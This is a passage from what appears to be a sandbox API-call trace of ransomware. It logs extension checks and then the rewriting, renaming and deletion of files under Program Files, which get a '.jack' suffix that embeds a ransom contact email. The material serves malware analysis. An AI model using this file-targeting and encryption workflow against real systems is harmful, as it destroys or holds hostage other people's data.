Files\\Java\\jre1.8.0_144\\THIRDPARTYLICENSEREADME.txt") returned 62 [0201.682] lstrlenW (lpString=".dbf") returned 4 [0201.682] lstrcmpiW (lpString1=".dbf", lpString2=".txt") returned -1 [0201.682] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\THIRDPARTYLICENSEREADME.txt") returned 62 [0201.682] lstrlenW (lpString=".1cd") returned 4 [0201.682] lstrcmpiW (lpString1=".1cd", lpString2=".txt") returned -1 [0201.682] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\THIRDPARTYLICENSEREADME.txt") returned 62 [0201.682] lstrlenW (lpString=".jpg") returned 4 [0201.682] lstrcmpiW (lpString1=".jpg", lpString2=".txt") returned -1 [0201.682] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\THIRDPARTYLICENSEREADME.txt") returned 62 [0201.682] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\THIRDPARTYLICENSEREADME.txt") returned 62 [0201.682] lstrlenW (lpString=".doc") returned 4 [0201.682] lstrcmpiW (lpString1=".doc", lpString2=".txt") returned -1 [0201.682] lstrlenW (lpString=".docx") returned 5 [0201.682] lstrcmpiW (lpString1=".docx", lpString2="E.txt") returned -1 [0201.682] lstrlenW (lpString=".pdf") returned 4 [0201.682] lstrcmpiW (lpString1=".pdf", lpString2=".txt") returned -1 [0201.682] lstrlenW (lpString=".xls") returned 4 [0201.682] lstrcmpiW (lpString1=".xls", lpString2=".txt") returned 1 [0201.682] lstrlenW (lpString=".xlsx") returned 5 [0201.682] lstrcmpiW (lpString1=".xlsx", lpString2="E.txt") returned -1 [0201.682] lstrlenW (lpString=".ppt") returned 4 [0201.682] lstrcmpiW (lpString1=".ppt", lpString2=".txt") returned -1 [0201.682] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\THIRDPARTYLICENSEREADME.txt") returned 62 [0201.682] lstrlenW (lpString=".zip") returned 4 [0201.682] lstrcmpiW (lpString1=".zip", lpString2=".txt") returned 1 [0201.682] lstrlenW (lpString=".rar") returned 4 [0201.682] lstrcmpiW (lpString1=".rar", lpString2=".txt") returned -1 [0201.682] lstrlenW (lpString=".bz2") returned 4 [0201.682] lstrcmpiW (lpString1=".bz2", lpString2=".txt") returned -1 [0201.682] lstrlenW (lpString=".7z") returned 3 [0201.682] lstrcmpiW (lpString1=".7z", lpString2="txt") returned -1 [0201.682] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\THIRDPARTYLICENSEREADME.txt") returned 62 [0201.682] lstrlenW (lpString=".dbf") returned 4 [0201.682] lstrcmpiW (lpString1=".dbf", lpString2=".txt") returned -1 [0201.682] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\THIRDPARTYLICENSEREADME.txt") returned 62 [0201.683] lstrlenW (lpString=".1cd") returned 4 [0201.683] lstrcmpiW (lpString1=".1cd", lpString2=".txt") returned -1 [0201.683] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\THIRDPARTYLICENSEREADME.txt") returned 62 [0201.683] lstrlenW (lpString=".jpg") returned 4 [0201.683] lstrcmpiW (lpString1=".jpg", lpString2=".txt") returned -1 [0201.683] lstrcmpiW (lpString1=".html", lpString2=".jack") returned -1 [0201.683] lstrlenW (lpString="Welcome.html") returned 12 [0201.683] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\Welcome.html" (normalized: "c:\\program files\\java\\jre1.8.0_144\\welcome.html"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x420 [0201.683] GetFileSizeEx (in: hFile=0x420, lpFileSize=0x3a5ff14 | out: lpFileSize=0x3a5ff14*=955) returned 1 [0201.683] CloseHandle (hObject=0x420) returned 1 [0201.683] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\Welcome.html" (normalized: "c:\\program files\\java\\jre1.8.0_144\\welcome.html")) returned 0x20 [0201.683] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\Welcome.html.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\java\\jre1.8.0_144\\welcome.html.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0201.683] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\Welcome.html" (normalized: "c:\\program files\\java\\jre1.8.0_144\\welcome.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x420 [0201.683] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec0 | out: lpNewFilePointer=0x0) returned 1 [0201.683] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec0 | out: lpNewFilePointer=0x0) returned 1 [0201.683] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\Welcome.html.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\java\\jre1.8.0_144\\welcome.html.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x404 [0201.684] GetLastError () returned 0x0 [0201.684] ReadFile (in: hFile=0x420, lpBuffer=0x4555020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a5fecc, lpOverlapped=0x0 | out: lpBuffer=0x4555020*, lpNumberOfBytesRead=0x3a5fecc*=0x3bb, lpOverlapped=0x0) returned 1 [0201.685] WriteFile (in: hFile=0x404, lpBuffer=0x4555020*, nNumberOfBytesToWrite=0x3c0, lpNumberOfBytesWritten=0x3a5fc94, lpOverlapped=0x0 | out: lpBuffer=0x4555020*, lpNumberOfBytesWritten=0x3a5fc94*=0x3c0, lpOverlapped=0x0) returned 1 [0201.686] ReadFile (in: hFile=0x420, lpBuffer=0x4555020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a5fecc, lpOverlapped=0x0 | out: lpBuffer=0x4555020*, lpNumberOfBytesRead=0x3a5fecc*=0x0, lpOverlapped=0x0) returned 1 [0201.686] WriteFile (in: hFile=0x404, lpBuffer=0x4555020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x3a5fc94, lpOverlapped=0x0 | out: lpBuffer=0x4555020*, lpNumberOfBytesWritten=0x3a5fc94*=0xec, lpOverlapped=0x0) returned 1 [0201.686] SetEndOfFile (hFile=0x404) returned 1 [0201.686] CloseHandle (hObject=0x404) returned 1 [0201.687] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec0 | out: lpNewFilePointer=0x0) returned 1 [0201.687] SetEndOfFile (hFile=0x420) returned 1 [0201.687] CloseHandle (hObject=0x420) returned 1 [0201.688] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\Welcome.html.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x20) returned 1 [0201.688] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\Welcome.html" (normalized: "c:\\program files\\java\\jre1.8.0_144\\welcome.html")) returned 1 [0201.688] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\Welcome.html") returned 47 [0201.688] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\Welcome.html") returned 47 [0201.688] lstrlenW (lpString=".doc") returned 4 [0201.688] lstrcmpiW (lpString1=".doc", lpString2="html") returned -1 [0201.688] lstrlenW (lpString=".docx") returned 5 [0201.688] lstrcmpiW (lpString1=".docx", lpString2=".html") returned -1 [0201.688] lstrlenW (lpString=".pdf") returned 4 [0201.688] lstrcmpiW (lpString1=".pdf", lpString2="html") returned -1 [0201.688] lstrlenW (lpString=".xls") returned 4 [0201.688] lstrcmpiW (lpString1=".xls", lpString2="html") returned -1 [0201.688] lstrlenW (lpString=".xlsx") returned 5 [0201.688] lstrcmpiW (lpString1=".xlsx", lpString2=".html") returned 1 [0201.688] lstrlenW (lpString=".ppt") returned 4 [0201.688] lstrcmpiW (lpString1=".ppt", lpString2="html") returned -1 [0201.688] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\Welcome.html") returned 47 [0201.688] lstrlenW (lpString=".zip") returned 4 [0201.688] lstrcmpiW (lpString1=".zip", lpString2="html") returned -1 [0201.688] lstrlenW (lpString=".rar") returned 4 [0201.688] lstrcmpiW (lpString1=".rar", lpString2="html") returned -1 [0201.689] lstrlenW (lpString=".bz2") returned 4 [0201.689] lstrcmpiW (lpString1=".bz2", lpString2="html") returned -1 [0201.689] lstrlenW (lpString=".7z") returned 3 [0201.689] lstrcmpiW (lpString1=".7z", lpString2="tml") returned -1 [0201.689] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\Welcome.html") returned 47 [0201.689] lstrlenW (lpString=".dbf") returned 4 [0201.689] lstrcmpiW (lpString1=".dbf", lpString2="html") returned -1 [0201.689] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\Welcome.html") returned 47 [0201.689] lstrlenW (lpString=".1cd") returned 4 [0201.689] lstrcmpiW (lpString1=".1cd", lpString2="html") returned -1 [0201.689] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\Welcome.html") returned 47 [0201.689] lstrlenW (lpString=".jpg") returned 4 [0201.689] lstrcmpiW (lpString1=".jpg", lpString2="html") returned -1 [0201.689] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\Welcome.html") returned 47 [0201.689] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\Welcome.html") returned 47 [0201.689] lstrlenW (lpString=".doc") returned 4 [0201.689] lstrcmpiW (lpString1=".doc", lpString2="html") returned -1 [0201.689] lstrlenW (lpString=".docx") returned 5 [0201.689] lstrcmpiW (lpString1=".docx", lpString2=".html") returned -1 [0201.689] lstrlenW (lpString=".pdf") returned 4 [0201.689] lstrcmpiW (lpString1=".pdf", lpString2="html") returned -1 [0201.689] lstrlenW (lpString=".xls") returned 4 [0201.689] lstrcmpiW (lpString1=".xls", lpString2="html") returned -1 [0201.689] lstrlenW (lpString=".xlsx") returned 5 [0201.689] lstrcmpiW (lpString1=".xlsx", lpString2=".html") returned 1 [0201.689] lstrlenW (lpString=".ppt") returned 4 [0201.689] lstrcmpiW (lpString1=".ppt", lpString2="html") returned -1 [0201.689] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\Welcome.html") returned 47 [0201.689] lstrlenW (lpString=".zip") returned 4 [0201.689] lstrcmpiW (lpString1=".zip", lpString2="html") returned -1 [0201.689] lstrlenW (lpString=".rar") returned 4 [0201.689] lstrcmpiW (lpString1=".rar", lpString2="html") returned -1 [0201.689] lstrlenW (lpString=".bz2") returned 4 [0201.689] lstrcmpiW (lpString1=".bz2", lpString2="html") returned -1 [0201.689] lstrlenW (lpString=".7z") returned 3 [0201.689] lstrcmpiW (lpString1=".7z", lpString2="tml") returned -1 [0201.689] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\Welcome.html") returned 47 [0201.689] lstrlenW (lpString=".dbf") returned 4 [0201.690] lstrcmpiW (lpString1=".dbf", lpString2="html") returned -1 [0201.690] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\Welcome.html") returned 47 [0201.690] lstrlenW (lpString=".1cd") returned 4 [0201.690] lstrcmpiW (lpString1=".1cd", lpString2="html") returned -1 [0201.690] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\Welcome.html") returned 47 [0201.690] lstrlenW (lpString=".jpg") returned 4 [0201.690] lstrcmpiW (lpString1=".jpg", lpString2="html") returned -1 [0201.690] lstrcmpiW (lpString1=".xml", lpString2=".jack") returned 1 [0201.690] lstrlenW (lpString="AppXManifest.xml") returned 16 [0201.690] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\AppXManifest.xml" (normalized: "c:\\program files\\microsoft office\\appxmanifest.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x420 [0201.690] GetFileSizeEx (in: hFile=0x420, lpFileSize=0x3a5ff14 | out: lpFileSize=0x3a5ff14*=5944055) returned 1 [0201.690] CloseHandle (hObject=0x420) returned 1 [0201.690] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\AppXManifest.xml" (normalized: "c:\\program files\\microsoft office\\appxmanifest.xml")) returned 0x20 [0201.690] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\AppXManifest.xml.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\microsoft office\\appxmanifest.xml.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0201.690] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\AppXManifest.xml" (normalized: "c:\\program files\\microsoft office\\appxmanifest.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\AppXManifest.xml.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\microsoft office\\appxmanifest.xml.id-b4197730.[lockhelp@qq.com].jack")) returned 1 [0201.691] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\AppXManifest.xml.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\microsoft office\\appxmanifest.xml.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x420 [0201.691] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fc64 | out: lpNewFilePointer=0x0) returned 1 [0201.691] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fc24 | out: lpNewFilePointer=0x0) returned 1 [0201.691] ReadFile (in: hFile=0x420, lpBuffer=0x4555058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x3a5fc30, lpOverlapped=0x0 | out: lpBuffer=0x4555058*, lpNumberOfBytesRead=0x3a5fc30*=0x40000, lpOverlapped=0x0) returned 1 [0201.693] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x1e3ba7, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fc24 | out: lpNewFilePointer=0x0) returned 1 [0201.693] ReadFile (in: hFile=0x420, lpBuffer=0x4595058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x3a5fc30, lpOverlapped=0x0 | out: lpBuffer=0x4595058*, lpNumberOfBytesRead=0x3a5fc30*=0x40000, lpOverlapped=0x0) returned 1 [0201.699] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x3a5fc64 | out: lpNewFilePointer=0xffffffff) returned 1 [0201.699] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x56b2f7, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fc24 | out: lpNewFilePointer=0x0) returned 1 [0201.699] ReadFile (in: hFile=0x420, lpBuffer=0x45d5058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x3a5fc30, lpOverlapped=0x0 | out: lpBuffer=0x45d5058*, lpNumberOfBytesRead=0x3a5fc30*=0x40000, lpOverlapped=0x0) returned 1 [0203.089] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec0 | out: lpNewFilePointer=0x0) returned 1 [0203.089] WriteFile (in: hFile=0x420, lpBuffer=0x4555020*, nNumberOfBytesToWrite=0xc010c, lpNumberOfBytesWritten=0x3a5fca8, lpOverlapped=0x0 | out: lpBuffer=0x4555020*, lpNumberOfBytesWritten=0x3a5fca8*=0xc010c, lpOverlapped=0x0) returned 1 [0203.190] SetEndOfFile (hFile=0x420) returned 1 [0203.191] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x40000) returned 0x47d1060 [0203.196] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fc74 | out: lpNewFilePointer=0x0) returned 1 [0203.196] WriteFile (in: hFile=0x420, lpBuffer=0x47d1060*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x3a5fc80, lpOverlapped=0x0 | out: lpBuffer=0x47d1060*, lpNumberOfBytesWritten=0x3a5fc80*=0x40000, lpOverlapped=0x0) returned 1 [0203.197] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x1e3ba7, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fc74 | out: lpNewFilePointer=0x0) returned 1 [0203.197] WriteFile (in: hFile=0x420, lpBuffer=0x47d1060*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x3a5fc80, lpOverlapped=0x0 | out: lpBuffer=0x47d1060*, lpNumberOfBytesWritten=0x3a5fc80*=0x40000, lpOverlapped=0x0) returned 1 [0203.203] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x56b2f7, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fc74 | out: lpNewFilePointer=0x0) returned 1 [0203.203] WriteFile (in: hFile=0x420, lpBuffer=0x47d1060*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x3a5fc80, lpOverlapped=0x0 | out: lpBuffer=0x47d1060*, lpNumberOfBytesWritten=0x3a5fc80*=0x40000, lpOverlapped=0x0) returned 1 [0203.206] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x47d1060 | out: hHeap=0x5e0000) returned 1 [0203.206] CloseHandle (hObject=0x420) returned 1 [0203.432] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\AppXManifest.xml.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x20) returned 1 [0203.433] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\AppXManifest.xml") returned 50 [0203.433] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\AppXManifest.xml") returned 50 [0203.433] lstrlenW (lpString=".doc") returned 4 [0203.433] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0203.433] lstrlenW (lpString=".docx") returned 5 [0203.433] lstrcmpiW (lpString1=".docx", lpString2="t.xml") returned -1 [0203.433] lstrlenW (lpString=".pdf") returned 4 [0203.433] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0203.433] lstrlenW (lpString=".xls") returned 4 [0203.433] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0203.433] lstrlenW (lpString=".xlsx") returned 5 [0203.433] lstrcmpiW (lpString1=".xlsx", lpString2="t.xml") returned -1 [0203.433] lstrlenW (lpString=".ppt") returned 4 [0203.433] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0203.433] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\AppXManifest.xml") returned 50 [0203.433] lstrlenW (lpString=".zip") returned 4 [0203.433] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0203.433] lstrlenW (lpString=".rar") returned 4 [0203.433] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0203.433] lstrlenW (lpString=".bz2") returned 4 [0203.433] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0203.433] lstrlenW (lpString=".7z") returned 3 [0203.433] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0203.433] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\AppXManifest.xml") returned 50 [0203.433] lstrlenW (lpString=".dbf") returned 4 [0203.433] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0203.433] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\AppXManifest.xml") returned 50 [0203.433] lstrlenW (lpString=".1cd") returned 4 [0203.433] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0203.433] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\AppXManifest.xml") returned 50 [0203.433] lstrlenW (lpString=".jpg") returned 4 [0203.434] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0203.434] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\AppXManifest.xml") returned 50 [0203.434] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\AppXManifest.xml") returned 50 [0203.434] lstrlenW (lpString=".doc") returned 4 [0203.434] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0203.434] lstrlenW (lpString=".docx") returned 5 [0203.434] lstrcmpiW (lpString1=".docx", lpString2="t.xml") returned -1 [0203.434] lstrlenW (lpString=".pdf") returned 4 [0203.434] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0203.434] lstrlenW (lpString=".xls") returned 4 [0203.434] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0203.434] lstrlenW (lpString=".xlsx") returned 5 [0203.434] lstrcmpiW (lpString1=".xlsx", lpString2="t.xml") returned -1 [0203.434] lstrlenW (lpString=".ppt") returned 4 [0203.434] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0203.434] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\AppXManifest.xml") returned 50 [0203.434] lstrlenW (lpString=".zip") returned 4 [0203.434] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0203.434] lstrlenW (lpString=".rar") returned 4 [0203.434] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0203.434] lstrlenW (lpString=".bz2") returned 4 [0203.434] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0203.434] lstrlenW (lpString=".7z") returned 3 [0203.434] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0203.434] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\AppXManifest.xml") returned 50 [0203.434] lstrlenW (lpString=".dbf") returned 4 [0203.434] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0203.434] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\AppXManifest.xml") returned 50 [0203.434] lstrlenW (lpString=".1cd") returned 4 [0203.434] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0203.434] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\AppXManifest.xml") returned 50 [0203.434] lstrlenW (lpString=".jpg") returned 4 [0203.434] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0203.435] lstrcmpiW (lpString1=".xml", lpString2=".jack") returned 1 [0203.435] lstrlenW (lpString="AppXManifest.90160000-0018-0000-1000-0000000FF1CE.xml") returned 53 [0203.435] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0018-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0018-0000-1000-0000000ff1ce.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f4 [0203.995] GetFileSizeEx (in: hFile=0x3f4, lpFileSize=0x3a5ff14 | out: lpFileSize=0x3a5ff14*=496513) returned 1 [0203.995] CloseHandle (hObject=0x3f4) returned 1 [0203.995] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0018-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0018-0000-1000-0000000ff1ce.xml")) returned 0x220 [0203.995] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0018-0000-1000-0000000FF1CE.xml.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0018-0000-1000-0000000ff1ce.xml.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0203.996] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0018-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0018-0000-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f4 [0203.996] SetFilePointerEx (in: hFile=0x3f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec0 | out: lpNewFilePointer=0x0) returned 1 [0203.996] SetFilePointerEx (in: hFile=0x3f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec0 | out: lpNewFilePointer=0x0) returned 1 [0203.996] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0018-0000-1000-0000000FF1CE.xml.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0018-0000-1000-0000000ff1ce.xml.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ec [0204.357] GetLastError () returned 0x0 [0204.357] ReadFile (in: hFile=0x3f4, lpBuffer=0x4555020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a5fecc, lpOverlapped=0x0 | out: lpBuffer=0x4555020*, lpNumberOfBytesRead=0x3a5fecc*=0x79381, lpOverlapped=0x0) returned 1 [0204.673] WriteFile (in: hFile=0x3ec, lpBuffer=0x4555020*, nNumberOfBytesToWrite=0x79390, lpNumberOfBytesWritten=0x3a5fc94, lpOverlapped=0x0 | out: lpBuffer=0x4555020*, lpNumberOfBytesWritten=0x3a5fc94*=0x79390, lpOverlapped=0x0) returned 1 [0204.680] ReadFile (in: hFile=0x3f4, lpBuffer=0x4555020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a5fecc, lpOverlapped=0x0 | out: lpBuffer=0x4555020*, lpNumberOfBytesRead=0x3a5fecc*=0x0, lpOverlapped=0x0) returned 1 [0204.680] WriteFile (in: hFile=0x3ec, lpBuffer=0x4555020*, nNumberOfBytesToWrite=0x13e, lpNumberOfBytesWritten=0x3a5fc94, lpOverlapped=0x0 | out: lpBuffer=0x4555020*, lpNumberOfBytesWritten=0x3a5fc94*=0x13e, lpOverlapped=0x0) returned 1 [0204.680] SetEndOfFile (hFile=0x3ec) returned 1 [0204.680] CloseHandle (hObject=0x3ec) returned 1 [0204.688] SetFilePointerEx (in: hFile=0x3f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec0 | out: lpNewFilePointer=0x0) returned 1 [0204.688] SetEndOfFile (hFile=0x3f4) returned 1 [0204.693] CloseHandle (hObject=0x3f4) returned 1 [0204.693] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0018-0000-1000-0000000FF1CE.xml.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x220) returned 1 [0204.694] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0018-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0018-0000-1000-0000000ff1ce.xml")) returned 1 [0204.694] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0018-0000-1000-0000000FF1CE.xml") returned 104 [0204.694] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0018-0000-1000-0000000FF1CE.xml") returned 104 [0204.694] lstrlenW (lpString=".doc") returned 4 [0204.694] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0204.694] lstrlenW (lpString=".docx") returned 5 [0204.694] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0204.694] lstrlenW (lpString=".pdf") returned 4 [0204.694] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0204.694] lstrlenW (lpString=".xls") returned 4 [0204.695] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0204.695] lstrlenW (lpString=".xlsx") returned 5 [0204.695] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0204.695] lstrlenW (lpString=".ppt") returned 4 [0204.695] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0204.695] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0018-0000-1000-0000000FF1CE.xml") returned 104 [0204.695] lstrlenW (lpString=".zip") returned 4 [0204.695] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0204.695] lstrlenW (lpString=".rar") returned 4 [0204.695] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0204.695] lstrlenW (lpString=".bz2") returned 4 [0204.695] lstrcmpiW (lpString1=".bz2", 